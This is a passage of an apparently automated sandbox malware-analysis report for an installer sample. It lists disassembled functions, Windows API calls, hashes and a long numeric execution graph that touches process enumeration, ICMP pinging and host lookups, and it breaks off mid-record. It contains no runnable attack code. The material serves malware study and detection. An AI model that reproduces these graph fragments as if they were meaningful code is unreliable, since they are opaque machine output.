                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:3.6%
                                                                                                                                            Total number of Nodes:2000
                                                                                                                                            Total number of Limit Nodes:55
                                                                                                                                            execution_graph 96847 dcf4dc 96850 dccab0 96847->96850 96851 dccacb 96850->96851 96852 e1150c 96851->96852 96853 e114be 96851->96853 96880 dccaf0 96851->96880 96922 e462ff 207 API calls 2 library calls 96852->96922 96856 e114c8 96853->96856 96859 e114d5 96853->96859 96853->96880 96920 e46790 207 API calls 96856->96920 96872 dccdc0 96859->96872 96921 e46c2d 207 API calls 2 library calls 96859->96921 96863 e1179f 96863->96863 96865 dde807 39 API calls 96865->96880 96867 dccdee 96868 e116e8 96929 e46669 81 API calls 96868->96929 96872->96867 96930 e33fe1 81 API calls __wsopen_s 96872->96930 96876 dccf80 39 API calls 96876->96880 96880->96865 96880->96867 96880->96868 96880->96872 96880->96876 96881 dd0340 96880->96881 96904 dcbe2d 96880->96904 96908 dde7c1 39 API calls 96880->96908 96909 ddaa99 207 API calls 96880->96909 96910 de05b2 5 API calls __Init_thread_wait 96880->96910 96911 ddbc58 96880->96911 96916 de0413 29 API calls __onexit 96880->96916 96917 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96880->96917 96918 ddf4df 81 API calls 96880->96918 96919 ddf346 207 API calls 96880->96919 96923 dcb4c8 8 API calls 96880->96923 96924 e1ffaf 8 API calls 96880->96924 96925 dcbed9 96880->96925 96882 dd0376 ISource 96881->96882 96884 de014b 8 API calls 96882->96884 96885 e1632b 96882->96885 96886 dd1695 96882->96886 96888 e15cdb 96882->96888 96889 e1625a 96882->96889 96895 dd049d ISource 96882->96895 96896 dcbed9 8 API calls 96882->96896 96897 de05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96882->96897 96898 dcbf73 8 API calls 96882->96898 96899 de0413 29 API calls pre_c_initialization 96882->96899 96900 e16115 96882->96900 96901 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96882->96901 96903 dd0aae ISource 96882->96903 96931 dd1e50 96882->96931 96941 dd1990 207 API calls 2 library calls 96882->96941 96884->96882 96945 e33fe1 81 API calls __wsopen_s 96885->96945 96890 dcbed9 8 API calls 96886->96890 96886->96895 96894 dcbed9 8 API calls 96888->96894 96888->96895 96944 e33fe1 81 API calls __wsopen_s 96889->96944 96890->96895 96894->96895 96895->96880 96896->96882 96897->96882 96898->96882 96899->96882 96942 e33fe1 81 API calls __wsopen_s 96900->96942 96901->96882 96943 e33fe1 81 API calls __wsopen_s 96903->96943 96905 dcbe38 96904->96905 96906 dcbe67 96905->96906 96950 dcbfa5 39 API calls 96905->96950 96906->96880 96908->96880 96909->96880 96910->96880 96951 de014b 96911->96951 96913 ddbc65 96960 dcb329 96913->96960 96916->96880 96917->96880 96918->96880 96919->96880 96920->96859 96921->96872 96922->96880 96923->96880 96924->96880 96926 dcbefc __fread_nolock 96925->96926 96927 dcbeed 96925->96927 96926->96880 96927->96926 96928 de017b 8 API calls 96927->96928 96928->96926 96929->96872 96930->96863 96938 dd1e6d ISource 96931->96938 96933 dd2512 96935 dd1ff7 ISource 96933->96935 96949 ddbe08 39 API calls 96933->96949 96935->96882 96936 e17837 96936->96935 96948 ded2d5 39 API calls 96936->96948 96938->96933 96938->96935 96938->96936 96940 e1766b 96938->96940 96947 dde322 8 API calls ISource 96938->96947 96946 ded2d5 39 API calls 96940->96946 96941->96882 96942->96903 96943->96895 96944->96895 96945->96895 96946->96940 96947->96938 96948->96935 96949->96935 96950->96906 96953 de0150 ___std_exception_copy 96951->96953 96952 de016a 96952->96913 96953->96952 96956 de016c 96953->96956 96966 de521d 7 API calls 2 library calls 96953->96966 96955 de09dd 96968 de3614 RaiseException 96955->96968 96956->96955 96967 de3614 RaiseException 96956->96967 96959 de09fa 96959->96913 96961 dcb338 _wcslen 96960->96961 96969 de017b 96961->96969 96963 dcb360 __fread_nolock 96964 de014b 8 API calls 96963->96964 96965 dcb376 96964->96965 96965->96880 96966->96953 96967->96955 96968->96959 96970 de014b ___std_exception_copy 96969->96970 96971 de016a 96970->96971 96974 de016c 96970->96974 96978 de521d 7 API calls 2 library calls 96970->96978 96971->96963 96973 de09dd 96980 de3614 RaiseException 96973->96980 96974->96973 96979 de3614 RaiseException 96974->96979 96977 de09fa 96977->96963 96978->96970 96979->96973 96980->96977 96981 dd235c 96982 dd2365 __fread_nolock 96981->96982 96984 dd1ff7 __fread_nolock 96982->96984 96985 e174e3 96982->96985 96988 dd23b6 96982->96988 96989 de014b 8 API calls 96982->96989 96992 de017b 8 API calls 96982->96992 96993 dc8ec0 96982->96993 97021 e213c8 8 API calls __fread_nolock 96985->97021 96987 e174ef 96987->96984 96991 dcbed9 8 API calls 96987->96991 97016 dc7d74 96988->97016 96989->96982 96991->96984 96992->96982 96994 dc8ed5 96993->96994 96995 dc8ed2 96993->96995 96996 dc8edd 96994->96996 96997 dc8f0b 96994->96997 96995->96982 97022 de5536 26 API calls 96996->97022 96998 e06b1f 96997->96998 97002 dc8f1d 96997->97002 97009 e06a38 96997->97009 97025 de54f3 26 API calls 96998->97025 97000 dc8eed 97005 de014b 8 API calls 97000->97005 97023 ddfe6f 51 API calls 97002->97023 97003 e06b37 97003->97003 97007 dc8ef7 97005->97007 97010 dcb329 8 API calls 97007->97010 97008 e06ab1 97024 ddfe6f 51 API calls 97008->97024 97009->97008 97011 de017b 8 API calls 97009->97011 97010->96995 97012 e06a81 97011->97012 97013 de014b 8 API calls 97012->97013 97014 e06aa8 97013->97014 97015 dcb329 8 API calls 97014->97015 97015->97008 97017 dc7d8a 97016->97017 97020 dc7d85 __fread_nolock 97016->97020 97018 de017b 8 API calls 97017->97018 97019 e06528 97017->97019 97018->97020 97020->96984 97021->96987 97022->97000 97023->97000 97024->96998 97025->97003 97026 dcdd3d 97027 e119c2 97026->97027 97028 dcdd63 97026->97028 97031 e11a82 97027->97031 97036 e11a26 97027->97036 97039 e11a46 97027->97039 97029 dcdead 97028->97029 97032 de014b 8 API calls 97028->97032 97033 de017b 8 API calls 97029->97033 97086 e33fe1 81 API calls __wsopen_s 97031->97086 97038 dcdd8d 97032->97038 97045 dcdee4 __fread_nolock 97033->97045 97034 e11a7d 97084 dde6e8 207 API calls 97036->97084 97040 de014b 8 API calls 97038->97040 97038->97045 97039->97034 97085 e33fe1 81 API calls __wsopen_s 97039->97085 97041 dcdddb 97040->97041 97041->97036 97043 dcde16 97041->97043 97042 de017b 8 API calls 97042->97045 97044 dd0340 207 API calls 97043->97044 97046 dcde29 97044->97046 97045->97039 97045->97042 97046->97034 97046->97045 97047 e11aa5 97046->97047 97048 dcde77 97046->97048 97050 dcd526 97046->97050 97087 e33fe1 81 API calls __wsopen_s 97047->97087 97048->97029 97048->97050 97051 de014b 8 API calls 97050->97051 97052 dcd589 97051->97052 97068 dcc32d 97052->97068 97055 de014b 8 API calls 97062 dcd66e ISource 97055->97062 97059 e11f79 97089 e256ae 8 API calls ISource 97059->97089 97061 e11f94 97062->97059 97062->97061 97063 dcbed9 8 API calls 97062->97063 97064 dcc3ab 8 API calls 97062->97064 97065 dcd911 ISource 97062->97065 97088 dcb4c8 8 API calls 97062->97088 97063->97062 97064->97062 97066 dcd9ac ISource 97065->97066 97075 dcc3ab 97065->97075 97067 dcd9c3 97066->97067 97083 dde30a 8 API calls ISource 97066->97083 97072 dcc33d 97068->97072 97069 dcc345 97069->97055 97070 de014b 8 API calls 97070->97072 97072->97069 97072->97070 97073 dcbed9 8 API calls 97072->97073 97074 dcc32d 8 API calls 97072->97074 97090 dcbf73 97072->97090 97073->97072 97074->97072 97076 dcc3b9 97075->97076 97081 dcc3e1 ISource 97075->97081 97077 dcc3c7 97076->97077 97078 dcc3ab 8 API calls 97076->97078 97079 dcc3ab 8 API calls 97077->97079 97080 dcc3cd 97077->97080 97078->97077 97079->97080 97080->97081 97095 dcc7e0 8 API calls ISource 97080->97095 97081->97066 97083->97066 97084->97039 97085->97034 97086->97034 97087->97034 97088->97062 97089->97061 97091 de017b 8 API calls 97090->97091 97092 dcbf88 97091->97092 97093 de014b 8 API calls 97092->97093 97094 dcbf96 97093->97094 97094->97072 97095->97081 97096 dd0ebf 97097 dd0ed3 97096->97097 97103 dd1425 97096->97103 97098 dd0ee5 97097->97098 97101 de014b 8 API calls 97097->97101 97099 e1562c 97098->97099 97102 dd0f3e 97098->97102 97190 dcb4c8 8 API calls 97098->97190 97191 e31b14 8 API calls 97099->97191 97101->97098 97121 dd049d ISource 97102->97121 97129 dd2b20 97102->97129 97103->97098 97106 dcbed9 8 API calls 97103->97106 97106->97098 97107 de014b 8 API calls 97124 dd0376 ISource 97107->97124 97108 e1632b 97195 e33fe1 81 API calls __wsopen_s 97108->97195 97109 dd1e50 40 API calls 97109->97124 97110 dd1695 97116 dcbed9 8 API calls 97110->97116 97110->97121 97111 dd0aae ISource 97193 e33fe1 81 API calls __wsopen_s 97111->97193 97113 e15cdb 97120 dcbed9 8 API calls 97113->97120 97113->97121 97114 e1625a 97194 e33fe1 81 API calls __wsopen_s 97114->97194 97115 dcbed9 8 API calls 97115->97124 97116->97121 97120->97121 97122 de05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97122->97124 97123 dcbf73 8 API calls 97123->97124 97124->97107 97124->97108 97124->97109 97124->97110 97124->97111 97124->97113 97124->97114 97124->97115 97124->97121 97124->97122 97124->97123 97125 de0413 29 API calls pre_c_initialization 97124->97125 97126 e16115 97124->97126 97128 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97124->97128 97189 dd1990 207 API calls 2 library calls 97124->97189 97125->97124 97192 e33fe1 81 API calls __wsopen_s 97126->97192 97128->97124 97130 dd2b86 97129->97130 97131 dd2fc0 97129->97131 97133 e17bd8 97130->97133 97134 dd2ba0 97130->97134 97411 de05b2 5 API calls __Init_thread_wait 97131->97411 97374 e47af9 97133->97374 97196 dd3160 97134->97196 97136 dd2fca 97140 dcb329 8 API calls 97136->97140 97145 dd300b 97136->97145 97138 e17be4 97138->97124 97149 dd2fe4 97140->97149 97141 dd3160 9 API calls 97142 dd2bc6 97141->97142 97144 dd2bfc 97142->97144 97142->97145 97143 e17bed 97143->97124 97146 e17bfd 97144->97146 97152 dd2c18 __fread_nolock 97144->97152 97145->97143 97413 dcb4c8 8 API calls 97145->97413 97416 e33fe1 81 API calls __wsopen_s 97146->97416 97412 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97149->97412 97150 dd3049 97414 dde6e8 207 API calls 97150->97414 97152->97150 97153 e17c15 97152->97153 97160 de014b 8 API calls 97152->97160 97163 de017b 8 API calls 97152->97163 97168 dd0340 207 API calls 97152->97168 97170 dd2d3f 97152->97170 97171 dd2dd7 ISource 97152->97171 97174 e17c59 97152->97174 97417 e33fe1 81 API calls __wsopen_s 97153->97417 97156 dd2d4c 97158 dd3160 9 API calls 97156->97158 97157 e17c78 97419 e461a2 53 API calls _wcslen 97157->97419 97162 dd2d59 97158->97162 97160->97152 97161 dd3082 97415 ddfe39 8 API calls 97161->97415 97166 dd3160 9 API calls 97162->97166 97162->97171 97163->97152 97165 dd2f2d 97165->97124 97173 dd2d73 97166->97173 97168->97152 97169 dd2e8b ISource 97169->97165 97410 dde322 8 API calls ISource 97169->97410 97170->97156 97170->97157 97171->97161 97171->97169 97175 dd3160 9 API calls 97171->97175 97206 e4ad47 97171->97206 97211 dc8bda 97171->97211 97286 e4a5b2 97171->97286 97292 e4a9ac 97171->97292 97300 e49ffc 97171->97300 97303 e40fb8 97171->97303 97328 e3f94a 97171->97328 97337 e4a6aa 97171->97337 97345 e49fe8 97171->97345 97348 e3664c 97171->97348 97355 ddac3e 97171->97355 97420 e33fe1 81 API calls __wsopen_s 97171->97420 97173->97171 97177 dcbed9 8 API calls 97173->97177 97418 e33fe1 81 API calls __wsopen_s 97174->97418 97175->97171 97177->97171 97189->97124 97190->97098 97191->97121 97192->97111 97193->97121 97194->97121 97195->97121 97197 dd317d 97196->97197 97198 dd31a1 97196->97198 97205 dd2bb0 97197->97205 97423 de05b2 5 API calls __Init_thread_wait 97197->97423 97421 de05b2 5 API calls __Init_thread_wait 97198->97421 97200 dd31ab 97200->97197 97422 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97200->97422 97202 dd9f47 97202->97205 97424 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97202->97424 97205->97141 97207 dc8ec0 52 API calls 97206->97207 97208 e4ad63 97207->97208 97425 e2dd87 CreateToolhelp32Snapshot Process32FirstW 97208->97425 97210 e4ad72 97210->97171 97212 dc8ec0 52 API calls 97211->97212 97213 dc8bf9 97212->97213 97214 dc8ec0 52 API calls 97213->97214 97215 dc8c0e 97214->97215 97216 dc8ec0 52 API calls 97215->97216 97217 dc8c21 97216->97217 97218 dc8ec0 52 API calls 97217->97218 97219 dc8c37 97218->97219 97552 dc7ad5 97219->97552 97222 e06767 97225 dc7e12 8 API calls 97222->97225 97224 dc8c72 97224->97222 97250 dc8c98 try_get_first_available_module 97224->97250 97226 e06786 97225->97226 97227 dc8470 8 API calls 97226->97227 97228 e06798 97227->97228 97232 dc8a60 8 API calls 97228->97232 97259 e067bd 97228->97259 97230 dc8d3c 97558 dc7e12 97230->97558 97231 dc8ec0 52 API calls 97237 dc8d27 97231->97237 97232->97259 97234 dc8d5c 97238 dc8d71 97234->97238 97239 e0696e 97234->97239 97235 e06873 97240 e068bc 97235->97240 97241 e0687d 97235->97241 97242 dc8ec0 52 API calls 97237->97242 97564 dc8470 97238->97564 97246 dc8470 8 API calls 97239->97246 97243 dc8470 8 API calls 97240->97243 97247 dc8470 8 API calls 97241->97247 97242->97230 97248 e068c5 97243->97248 97245 dc893c 8 API calls 97245->97259 97251 e0697b 97246->97251 97252 e06885 97247->97252 97253 dc8a60 8 API calls 97248->97253 97250->97230 97250->97231 97281 dc8d91 try_get_first_available_module 97250->97281 97256 dc8a60 8 API calls 97251->97256 97257 dc8ec0 52 API calls 97252->97257 97258 e068e1 97253->97258 97254 dcbd57 8 API calls 97254->97281 97255 dc8a60 8 API calls 97255->97259 97256->97281 97260 e06897 97257->97260 97264 dc8ec0 52 API calls 97258->97264 97259->97245 97259->97255 97284 dc8e71 97259->97284 97584 dc8844 8 API calls __fread_nolock 97259->97584 97585 dc8844 8 API calls __fread_nolock 97260->97585 97263 e068ab 97265 dc893c 8 API calls 97263->97265 97267 e068fc 97264->97267 97268 e068b9 97265->97268 97586 dc8844 8 API calls __fread_nolock 97267->97586 97276 dc8a60 8 API calls 97268->97276 97269 e069f1 97274 dc893c 8 API calls 97269->97274 97270 e069c1 97270->97269 97272 e069e5 97270->97272 97587 dcad40 8 API calls __fread_nolock 97272->97587 97278 e069ff 97274->97278 97275 e06910 97279 dc893c 8 API calls 97275->97279 97276->97284 97282 dc8a60 8 API calls 97278->97282 97279->97268 97280 e069ef 97281->97270 97281->97284 97569 dc8844 8 API calls __fread_nolock 97281->97569 97570 dc893c 97281->97570 97573 dc8a60 97281->97573 97283 e06a12 97282->97283 97285 dcbd57 8 API calls 97283->97285 97284->97171 97285->97280 97287 e4a5c5 97286->97287 97288 dc8ec0 52 API calls 97287->97288 97291 e4a5d4 97287->97291 97289 e4a632 97288->97289 97602 e318a9 97289->97602 97291->97171 97293 e4a9c8 97292->97293 97295 e4aa08 97292->97295 97293->97171 97294 e4aa26 97294->97293 97298 e4aa8e 97294->97298 97676 dcc98d 39 API calls 97294->97676 97295->97294 97675 dcc98d 39 API calls 97295->97675 97643 e30372 97298->97643 97717 e489b6 97300->97717 97302 e4a00c 97302->97171 97304 e40fe1 97303->97304 97305 e4100f WSAStartup 97304->97305 97820 dcc98d 39 API calls 97304->97820 97306 e41054 97305->97306 97327 e41023 ISource 97305->97327 97807 ddc1f6 97306->97807 97309 e40ffc 97309->97305 97821 dcc98d 39 API calls 97309->97821 97312 dc8ec0 52 API calls 97314 e41069 97312->97314 97313 e4100b 97313->97305 97812 ddf9d4 WideCharToMultiByte 97314->97812 97316 e41075 inet_addr gethostbyname 97317 e41093 IcmpCreateFile 97316->97317 97316->97327 97318 e410d3 97317->97318 97317->97327 97319 de017b 8 API calls 97318->97319 97320 e410ec 97319->97320 97822 dc423c 97320->97822 97323 e41102 IcmpSendEcho 97326 e4114c 97323->97326 97324 e4112b IcmpSendEcho 97324->97326 97325 e41212 IcmpCloseHandle WSACleanup 97325->97327 97326->97325 97327->97171 97329 de017b 8 API calls 97328->97329 97330 e3f95b 97329->97330 97331 dc423c 8 API calls 97330->97331 97332 e3f965 97331->97332 97333 dc8ec0 52 API calls 97332->97333 97334 e3f97c GetEnvironmentVariableW 97333->97334 97827 e3160f 8 API calls 97334->97827 97336 e3f999 ISource 97336->97171 97339 e4a705 97337->97339 97340 e4a6c5 97337->97340 97338 e4a723 97338->97340 97343 e4a780 97338->97343 97829 dcc98d 39 API calls 97338->97829 97339->97338 97828 dcc98d 39 API calls 97339->97828 97340->97171 97344 e30372 58 API calls 97343->97344 97344->97340 97346 e489b6 119 API calls 97345->97346 97347 e49ff8 97346->97347 97347->97171 97349 dc8ec0 52 API calls 97348->97349 97350 e36662 97349->97350 97830 e2dc54 97350->97830 97352 e3666a 97353 e3666e GetLastError 97352->97353 97354 e36683 97352->97354 97353->97354 97354->97171 97356 dc8ec0 52 API calls 97355->97356 97357 ddac68 97356->97357 97358 ddbc58 8 API calls 97357->97358 97359 ddac7f 97358->97359 97369 ddb09b _wcslen 97359->97369 97905 dcc98d 39 API calls 97359->97905 97361 ddbbbe 43 API calls 97361->97369 97362 de4d98 _strftime 40 API calls 97362->97369 97363 dc7ad5 8 API calls 97363->97369 97366 dc6c03 8 API calls 97366->97369 97367 dcc98d 39 API calls 97367->97369 97368 ddb1fb 97368->97171 97369->97361 97369->97362 97369->97363 97369->97366 97369->97367 97369->97368 97370 dc8ec0 52 API calls 97369->97370 97371 dc8577 8 API calls 97369->97371 97891 dc396b 97369->97891 97901 dc3907 97369->97901 97906 dcad40 8 API calls __fread_nolock 97369->97906 97907 dc7b1a 8 API calls 97369->97907 97370->97369 97371->97369 97375 e47b52 97374->97375 97376 e47b38 97374->97376 97945 e460e6 97375->97945 97956 e33fe1 81 API calls __wsopen_s 97376->97956 97380 dd0340 206 API calls 97381 e47bc1 97380->97381 97382 e47c5c 97381->97382 97385 e47c03 97381->97385 97405 e47b4a 97381->97405 97383 e47cb0 97382->97383 97384 e47c62 97382->97384 97386 dc8ec0 52 API calls 97383->97386 97383->97405 97957 e31ad8 8 API calls 97384->97957 97390 e3148b 8 API calls 97385->97390 97388 e47cc2 97386->97388 97391 dcc2c9 8 API calls 97388->97391 97389 e47c85 97958 dcbd07 8 API calls 97389->97958 97393 e47c3b 97390->97393 97394 e47ce6 CharUpperBuffW 97391->97394 97395 dd2b20 206 API calls 97393->97395 97396 e47d00 97394->97396 97395->97405 97397 e47d07 97396->97397 97398 e47d53 97396->97398 97952 e3148b 97397->97952 97399 dc8ec0 52 API calls 97398->97399 97400 e47d5b 97399->97400 97959 ddaa65 9 API calls 97400->97959 97404 dd2b20 206 API calls 97404->97405 97405->97138 97406 e47d65 97406->97405 97407 dc8ec0 52 API calls 97406->97407 97408 e47d80 97407->97408 97960 dcbd07 8 API calls 97408->97960 97410->97169 97411->97136 97412->97145 97413->97150 97414->97161 97415->97161 97416->97171 97417->97171 97418->97171 97419->97173 97420->97171 97421->97200 97422->97197 97423->97202 97424->97205 97435 e2e80e 97425->97435 97427 e2de86 CloseHandle 97427->97210 97428 e2ddd4 Process32NextW 97428->97427 97434 e2ddcd 97428->97434 97429 dcbf73 8 API calls 97429->97434 97430 dcb329 8 API calls 97430->97434 97434->97427 97434->97428 97434->97429 97434->97430 97441 dc568e 97434->97441 97483 dc7bb5 97434->97483 97492 dde36b 41 API calls 97434->97492 97436 e2e819 97435->97436 97437 e2e830 97436->97437 97440 e2e836 97436->97440 97493 de6722 GetStringTypeW _strftime 97436->97493 97494 de666b 39 API calls _strftime 97437->97494 97440->97434 97442 dcbf73 8 API calls 97441->97442 97443 dc56a4 97442->97443 97444 dcbf73 8 API calls 97443->97444 97445 dc56ac 97444->97445 97446 dcbf73 8 API calls 97445->97446 97447 dc56b4 97446->97447 97448 dcbf73 8 API calls 97447->97448 97449 dc56bc 97448->97449 97450 e04da1 97449->97450 97451 dc56f0 97449->97451 97452 dcbed9 8 API calls 97450->97452 97453 dcacc0 8 API calls 97451->97453 97454 e04daa 97452->97454 97455 dc56fe 97453->97455 97514 dcbd57 97454->97514 97507 dcadf4 97455->97507 97458 dc5708 97459 dc5733 97458->97459 97460 dcacc0 8 API calls 97458->97460 97461 dc5754 97459->97461 97476 dc5778 97459->97476 97480 e04dcc 97459->97480 97463 dc5729 97460->97463 97461->97476 97511 dc655e 97461->97511 97465 dcadf4 8 API calls 97463->97465 97464 dc5789 97468 dcbed9 8 API calls 97464->97468 97469 dc579f 97464->97469 97465->97459 97468->97469 97471 dc57b3 97469->97471 97474 dcbed9 8 API calls 97469->97474 97470 dc57be 97477 dcbed9 8 API calls 97470->97477 97481 dc57c9 97470->97481 97471->97470 97475 dcbed9 8 API calls 97471->97475 97473 dcacc0 8 API calls 97473->97476 97474->97471 97475->97470 97495 dcacc0 97476->97495 97477->97481 97478 dc655e 8 API calls 97479 e04e8c 97478->97479 97479->97476 97479->97478 97532 dcad40 8 API calls __fread_nolock 97479->97532 97520 dc8577 97480->97520 97481->97434 97484 dc7bc7 97483->97484 97485 e0641d 97483->97485 97541 dc7bd8 97484->97541 97551 e213c8 8 API calls __fread_nolock 97485->97551 97488 e06427 97490 e06433 97488->97490 97491 dcbed9 8 API calls 97488->97491 97489 dc7bd3 97489->97434 97491->97490 97492->97434 97493->97436 97494->97440 97498 dcace1 97495->97498 97506 dcaccf 97495->97506 97496 dcacda __fread_nolock 97496->97464 97499 e10557 97498->97499 97500 dcad07 97498->97500 97498->97506 97501 de014b 8 API calls 97499->97501 97533 dc88e8 8 API calls 97500->97533 97504 e10561 97501->97504 97503 e105a3 __fread_nolock 97505 de017b 8 API calls 97504->97505 97505->97506 97506->97496 97534 dcc2c9 97506->97534 97508 dcae02 97507->97508 97510 dcae0b __fread_nolock 97507->97510 97509 dcc2c9 8 API calls 97508->97509 97508->97510 97509->97510 97510->97458 97512 dcc2c9 8 API calls 97511->97512 97513 dc5761 97512->97513 97513->97473 97513->97476 97515 dcbd71 97514->97515 97519 dcbd64 97514->97519 97516 de014b 8 API calls 97515->97516 97517 dcbd7b 97516->97517 97518 de017b 8 API calls 97517->97518 97518->97519 97519->97459 97521 e06610 97520->97521 97522 dc8587 _wcslen 97520->97522 97523 dcadf4 8 API calls 97521->97523 97525 dc859d 97522->97525 97526 dc85c2 97522->97526 97524 e06619 97523->97524 97524->97524 97540 dc88e8 8 API calls 97525->97540 97527 de014b 8 API calls 97526->97527 97529 dc85ce 97527->97529 97531 de017b 8 API calls 97529->97531 97530 dc85a5 __fread_nolock 97530->97479 97531->97530 97532->97479 97533->97496 97535 dcc2dc 97534->97535 97539 dcc2d9 __fread_nolock 97534->97539 97536 de014b 8 API calls 97535->97536 97537 dcc2e7 97536->97537 97538 de017b 8 API calls 97537->97538 97538->97539 97539->97503 97540->97530 97542 dc7be7 97541->97542 97547 dc7c1b __fread_nolock 97541->97547 97543 e0644e 97542->97543 97544 dc7c0e 97542->97544 97542->97547 97546 de014b 8 API calls 97543->97546 97545 dc7d74 8 API calls 97544->97545 97545->97547 97548 e0645d 97546->97548 97547->97489 97549 de017b 8 API calls 97548->97549 97550 e06491 __fread_nolock 97549->97550 97551->97488 97553 de017b 8 API calls 97552->97553 97554 dc7afa 97553->97554 97555 de014b 8 API calls 97554->97555 97556 dc7b08 97555->97556 97556->97222 97557 dcc98d 39 API calls 97556->97557 97557->97224 97559 dc7e1a 97558->97559 97560 de014b 8 API calls 97559->97560 97561 dc7e28 97560->97561 97588 dc8445 97561->97588 97591 dcc760 97564->97591 97566 dc8480 97567 de017b 8 API calls 97566->97567 97568 dc851c 97566->97568 97567->97568 97568->97254 97569->97281 97571 de014b 8 API calls 97570->97571 97572 dc894a 97571->97572 97572->97281 97574 dc8a76 97573->97574 97575 e06737 97574->97575 97580 dc8a80 97574->97580 97600 ddb7a2 8 API calls 97575->97600 97576 e06744 97601 dcb4c8 8 API calls 97576->97601 97579 e06762 97579->97579 97580->97576 97581 dc8b94 97580->97581 97583 dc8b9b 97580->97583 97582 de014b 8 API calls 97581->97582 97582->97583 97583->97281 97584->97259 97585->97263 97586->97275 97587->97280 97589 de014b 8 API calls 97588->97589 97590 